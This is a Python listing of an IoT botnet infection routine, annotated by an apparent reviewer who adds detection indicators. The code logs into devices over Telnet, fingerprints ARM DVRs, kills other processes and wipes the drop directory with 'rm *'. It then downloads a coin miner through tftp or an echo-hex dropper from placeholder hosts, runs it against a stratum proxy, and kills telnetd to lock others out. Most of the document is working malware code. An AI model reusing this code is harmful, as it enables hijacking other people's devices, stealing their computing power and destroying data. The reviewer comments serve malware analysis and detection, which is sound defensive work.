# attempt: one Telnet login try against self.host with the given credentials,
# followed by a payload drop when the login yields a shell on a matching device.
# NOTE(review): indentation was lost in this paste (every line carries a "- "
# list marker), so block nesting is inferred from statement order only.
# Return values visible here: 2 after the payload started and telnetd was
# killed; 0 when the output matches an entry of failChecks, shows no prompt
# character, the device does not match, the download fails, or an error occurs
# at stage >= 4; 1 for empty output or an error before the password was sent.
# How the caller interprets these values is not shown on this page.
- def attempt(self, username, password):
- stage = 0
- try:
# Fixed target port 23 with a 5 s connect timeout: a host with no reachable
# Telnet listener never gets past this line.
- tn = telnetlib.Telnet(self.host, 23, 5)
- tn.read_until("login", 3)
- tn.write(username + "\n")
- tn.read_until("pass", 3)
- tn.write(password + "\n")
- stage = 4
# Reads the post-login output, lowercases it and strips spaces/CR/LF so the
# checks below are plain substring matches.
- out = tn.read_until("invalid", 5).lower()
- out = out.translate(None, " \r\n").rstrip().strip()
- if len(out) == 0:
- return 1
- #check if it contains invalid, fail, again or unauthorized
# failChecks is defined outside this listing.
- for fail in failChecks:
- if fail in out:
- return 0
# Any of # > $ ~ in the output is taken as evidence of a shell prompt.
- if "#" not in out and ">" not in out and "$" not in out and "~" not in out:
- return 0
# Keeps the post-login output on the instance; where it is used is not visible here.
- self.azz = out
- stage = 5
# Device fingerprint via /proc/version. The echo argument is the hex spelling
# of "done" and serves throughout this listing as an end-of-command marker;
# the literal \x64\x6f\x6e\x65 in a Telnet session is a usable detection string.
- tn.write("cat /proc/version && echo -ne '\\x64\\x6f\\x6e\\x65'\n")
- procVersion = tn.read_until("done", 2).lower()
- procVersionWorked = "done" in procVersion #irrelevant
# Continues only when the login output contains "dvrdvs" or /proc/version mentions "arm".
- if "dvrdvs" in out or (procVersionWorked and "arm" in procVersion):
# Kills every process whose ps line mentions /var/run/ or /dev/ before dropping
# its own file there; presumably this evicts software already running from
# those directories (verify against captured sessions).
- self.killProcesses(tn, ["/var/run/", "/dev/"])
- binaryResult = 2
# <BINARIES> and <STRATUM PROXY> are placeholders left by the paste's author;
# the real hosts are not on this page. The payload name and the stratum+tcp
# argument indicate a coin miner written to /var/run/.
- if "v5l" in procVersion:
- binaryResult = self.downloadBinary(tn, "/var/run/", "btcminer-arm", "http://<BINARIES>/", "-B -o stratum+tcp://<STRATUM PROXY>:3333")#old ass binary
- else:#is a dvr
- binaryResult = self.downloadBinary(tn, "/var/run/", "btcminer-arm", "http://<BINARIES>/", "-B -o stratum+tcp://<STRATUM PROXY>:3333 -t 4 -q")
- if binaryResult == 0:
# After a successful drop the telnetd process is killed, so an unexpected loss
# of Telnet service on such a device is a symptom worth checking.
- self.killProcesses(tn, ["telnetd"])
- return 2
- else:
- return 0
- return 0 #we didnt infect shit but save it anyways
# Both handlers behave the same: an error after the password was sent
# (stage >= 4) yields 0, an earlier one yields 1.
- except (socket.timeout, socket.error, EOFError):
- if stage >= 4:
- return 0
- return 1
- except Exception, e:
- if stage >= 4:
- return 0
- return 1
# killProcesses: lists processes on the remote shell and sends `kill -9` for
# each ps line that contains any string in containList. Returns nothing.
# tn is the open Telnet session; containList is a list of substrings.
- def killProcesses(self, tn, containList):
# Runs ps followed by the hex-escaped "done" marker and waits up to 10 s for it.
- tn.write("ps && echo -ne '\\x64\\x6f\\x6e\\x65'\n")#lets just hope we have echo support...
- psResult = tn.read_until("done", 10)#slow ass piece of shit
# The kill commands are collected into one ';'-separated command line.
- tokill = "echo start"
- for containing in containList:
- if containing in psResult:
- splitPs = psResult.replace("\r","").split("\n")
- for psLine in splitPs:
- if containing in psLine:
# Takes a space-separated field of the ps line as the kill target.
# NOTE(review): with indentation lost, the position of the `break` is not
# certain; presumably it stops at the first non-empty field (the PID column).
- for part in psLine.split(" "):
- if part != "":
- tokill = tokill + "; kill -9 "+part
- break
- tokill = tokill + "; echo -ne '\\x64\\x6f\\x6e\\x65'"
# On the device this shows up as a single shell line of the form
# "echo start; kill -9 <field>; ...; echo -ne '\x64\x6f\x6e\x65'".
- tn.write(tokill+"\n")#kill all illegal processes! ~.~
- psResult = tn.read_until("done", 5)#lets lower from 10 to 5
# downloadBinary: fetches a file named `arch` from `web` into `location` on the
# remote shell and runs it with `args`, using tftp when the device has it and
# an echo-written helper otherwise.
# Return values visible here: 0 when the final "done" marker was seen, -2 when
# a tftp-path step did not produce the marker, 1 when the echo path failed,
# -1 in a branch that cannot be reached because echoSupport is hard-coded True.
# Indicators this listing offers for the device side: `tftp --help`, `rm *` in
# the drop directory, files named wget-<arch> and rand0-<arch>, and
# `chmod u+x` immediately followed by execution.
- def downloadBinary(self, tn, location, arch, web, args=""):
- if location.endswith("/"): #trim / off the end of location (we provide that)
- location = location[:-1]
- if web.endswith("/"): #trim / off the end of web (we provide that)
- web = web[:-1]
# Waits 0.5 s for a sentinel string the code never sends; presumably this only
# drains pending output from the session.
- tn.read_until("+!#CLEAN_READS#!+", 0.5)
- echoSupport = True
- if not echoSupport:
- return -1 #there's no point in even trying, this box sucks!
- tn.write("cd %s && echo -ne '\\x64\\x6f\\x6e\\x65'\n" % (location))
- tn.read_until("done", 1)#irrelevant
# tftp availability is detected by looking for "octets" in the help output.
- tn.write("tftp --help\n")
- tftpSupport = "octets" in tn.read_until("octets", 2)
- tn.read_until("+!#CLEAN_READS#!+", 0.5)
- if tftpSupport: #cool, we have tftp, THIS IS A LITTLE BROKEN AT THE MOMENT
# <TFTP SERVER> is a placeholder left by the paste's author. `rm *` empties the
# current directory (location) before the helper wget-<arch> is fetched.
- tn.write("rm *; rm wget-%s; tftp -r wget-%s -g <TFTP SERVER> && echo -ne '\\x64\\x6f\\x6e\\x65'\n" % (arch, arch, arch))
- tftpResult = tn.read_until("done", 10)
- if not "done" in tftpResult:
- print("NOT THERE, RETREAT")
- return -2
# The fetched helper is made executable and run with the URL <web>/<arch>.
- tn.write("chmod u+x wget-%s && ./wget-%s %s/%s && echo -ne '\\x64\\x6f\\x6e\\x65'\n" % (arch, arch, web, arch))
- tftpResult = tn.read_until("done", 10)
- if not "done" in tftpResult:
- return -2
# The downloaded file is made executable and started with args.
- tn.write("chmod u+x %s && ./%s %s && echo -ne '\\x64\\x6f\\x6e\\x65'\n" % (arch, arch, args));
- tftpResult = tn.read_until("done", 10)
- if not "done" in tftpResult:
- return -2
- tftpWorked = "done" in tftpResult
- if tftpWorked:
- return 0 #exited successfully
# NOTE(review): indentation was lost in this paste, so which `if` the next
# `else` pairs with cannot be determined from the listing.
- else:
- #clean up and carry on
- tn.write("rm %s; echo -ne '\\x64\\x6f\\x6e\\x65'\n" % arch)
- tn.read_until("done", 1)
- #check if it's already there
# Runs ./rand0-<arch> -h and treats "invalid" in the reply as proof that the
# helper already exists in the directory.
- tn.write("./rand0-%s -h\n" % arch)
- writeWorked = "invalid" in tn.read_until("invalid", 2)
- if not writeWorked: #if we already downloaded it, why should we have to dl it again :P
- #looks like we're going to do it the old fashioned way
# Local file wget-<arch> is written to the device as rand0-<arch> through echo lines.
- binaryResult = self.writeBinary(tn, "wget-%s" % arch, "rand0-%s" % arch, location)
- if binaryResult != 0:
- return 1 #alright then, we have echo support but shit didnt work?
- #download and execute (if true) the binary
- tn.write("./rand0-%s %s/%s && chmod u+x %s && ./%s %s && echo -ne '\\x64\\x6f\\x6e\\x65'\n" % (arch, web, arch, arch, arch, args))
- echoWorked = "done" in tn.read_until("done", 15)
- if echoWorked:
- return 0
- else:
- return 1 #that didnt work, no idea why, but it didnt work.
- return 0
- #writes a binary using the echo -ne 'HEX' method
# writeBinary: recreates the local file `localName` on the remote shell as
# <location>/<filename> by sending one echo command per chunk, then marks it
# executable. Returns 0 on success, -1 when a chunk was not acknowledged with
# the "done" marker within 2 s, -2 when the chmod was not acknowledged.
- def writeBinary(self, tn, localName, filename, location):
- if location.endswith("/"): #trim / off the end of writeTo (we provide that)
- location = location[:-1]
# binaryLists is a cache defined outside this listing, keyed by localName only.
- if localName in binaryLists: #store the binary lists in memory globally
- echoList = binaryLists[localName]
- else:
- echoList = binaryLists[localName] = self.getEchoList(localName, filename, location)#and there's our echoList!
- tn.write("rm -rf %s/%s\n" % (location, filename)) #delete the old one if it exists
# Waits 0.5 s for a sentinel the code never sends; presumably drains pending output.
- tn.read_until("+!#CLEAN_READS#!+", 0.5)
# Each chunk is sent as its own command and must be acknowledged before the
# next one; a long run of `echo -ne '\x..' >> <file>` lines in one Telnet
# session is the observable pattern of this transfer.
- for line in echoList: #write the echo list 1 by 1
- tn.write(line + "\n")
- result = tn.read_until("done", 2) #use the done as verification
- if "done" in result:
- continue
- else:
- return -1 #echo not supported or something went wrong
- tn.write("chmod u+x %s/%s && echo -ne '\\x64\\x6f\\x6e\\x65'\n" % (location, filename)) #mark the written file executable
- chmodded = "done" in tn.read_until("done", 2)
- if chmodded:
- return 0
- else:
- return -2 #whaaaaaaaaaaa
- return 0
- #get a list of echo commands we need to run
- #by iterating through a file and converting sections of bytes (50 a time)
- #into hex and then putting them into an echo -ne 'HEX' line
- #additionally, we write \\x64\\x6f\\x6e\\x65 (ascii: done) which will allow us to verify that worked after
# getEchoList: reads the local file `localName` one byte at a time and returns
# a list of shell command strings; each appends a hex-escaped chunk to
# <location>/<outputName> and then echoes the hex spelling of "done".
# Nothing is sent to a remote host here; the strings are only built.
- def getEchoList(self, localName, outputName, location):
- with open(localName, "rb") as f:
# `converted` is assigned but not used anywhere in this method.
- converted = None
- result = []
- byte = f.read(1)
- i = 0
- current = ""
- while byte != "":
# A chunk is flushed when the byte counter reaches 51.
- if i == 51:
- i = 0
- result.append("echo -ne '%s' >> %s/%s && echo -e '\\x64\\x6f\\x6e\\x65'" % (current, location, outputName))#trailing echo prints the "done" marker for verification
- current = ""
# Each byte becomes a \xNN escape that the remote echo turns back into the raw byte.
- current = current + "\\x"+byte.encode("hex")
- byte = f.read(1)
- i = i + 1
# Flushes whatever is left after the last full chunk.
- if len(current) > 0:
- i = 0
- result.append("echo -ne '%s' >> %s/%s && echo -e '\\x64\\x6f\\x6e\\x65'" % (current, location, outputName))#trailing echo prints the "done" marker for verification
- current = ""
- return result